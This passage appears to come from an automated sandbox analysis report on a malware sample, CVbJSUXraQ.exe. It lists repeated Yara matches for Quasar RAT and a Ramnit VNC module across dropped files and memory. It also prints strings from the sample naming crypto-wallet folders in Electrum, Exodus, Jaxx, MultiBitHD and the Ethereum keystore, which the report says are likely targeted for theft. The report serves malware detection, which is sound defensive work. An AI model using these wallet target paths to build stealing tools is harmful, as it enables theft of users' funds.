                      Source: Yara matchFile source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.svchost.exe.c60000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.svchost.exe.cc5c50.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.svchost.exe.c9ac50.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.svchost.exe.c9ac50.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.CVbJSUXraQ.exe.1833408.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.svchost.exe.c9ac50.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.CVbJSUXraQ.exe.ee5bac.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.svchost.exe.c9ac50.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.f14fac.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.1808408.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000015.00000002.946249267.00000000007F7000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.945386236.00000000007C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.938070643.0000000000260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.938168634.0000000000297000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: vnc.exe PID: 6296, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 5200, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match | File source: dropped/vnc.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\vnc.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED
Found many strings related to Crypto-Wallets (likely being stolen)
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp | String found in binary or memory: electrum.dat
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp | String found in binary or memory: *6%appdata%\Electrum\wallets\$Coins\Electrum-LTC>%appdata%\Electrum-LTC\wallets\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp | String found in binary or memory: *.json,*.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp | String found in binary or memory: *.json,*.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp | String found in binary or memory: *.json,*.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp | String found in binary or memory: UTC*8%APPDATA%\Ethereum\keystore\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp | String found in binary or memory: Coins\Exodus
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp | String found in binary or memory: Coins\Ethereum
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp | String found in binary or memory: UTC*8%APPDATA%\Ethereum\keystore\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp | String found in binary or memory: *6%appdata%\Electrum\wallets\$Coins\Electrum-LTC>%appdata%\Electrum-LTC\wallets\
Source: Yara match | File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR

Remote Access Functionality:

Yara detected Quasar RAT
Source: Yara match | File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match | File source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED
Source: Yara match | File source: dropped/windef.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED
Yara detected Ramnit VNC Module
Source: Yara match | File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.f14fac.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.svchost.exe.cc5c50.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.cc5c50.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.cc5c50.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.cc5c50.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.svchost.exe.c9ac50.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c9ac50.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.1833408.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c9ac50.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c9ac50.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.f14fac.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
